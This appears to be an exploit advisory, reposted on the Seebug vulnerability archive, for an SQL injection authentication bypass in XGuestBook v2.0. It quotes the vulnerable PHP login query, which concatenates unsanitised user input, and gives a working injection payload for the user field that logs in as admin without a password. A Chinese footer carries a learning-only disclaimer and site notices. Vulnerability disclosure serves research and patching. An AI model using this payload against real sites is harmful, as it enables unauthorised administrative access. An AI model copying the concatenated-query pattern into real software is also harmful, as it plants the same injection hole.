########################################################################## Author = FireShot , Jacopo Vuga. Mail = fireshot<at>autistici<dot>org Vulnerability = SQL Admin Auth Bypass Software = XGuestBook v2.0 Download =http://script.wareseeker.com/download/xguestbook.rar/14488 Greets to = Osirys, Myral, str0ke ########################################################################### [CODE] $user = $_POST['user']; $pass = md5($_POST['pass']); $result = mysql_query("SELECT * FROM xgb_user WHERE user='" . $user . "' AND pass= '" . $pass . "'", $db_conn) or die (mysql_error()); [/CODE] [EXPLOIT] [URL] = http://www.site.com/login.php you can inject SQL code in the USER space to bypass the admin login [USER] = admin' or '1=1 [/EXPLOIT] ############################################################################
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京ICP备10040895号
暂无评论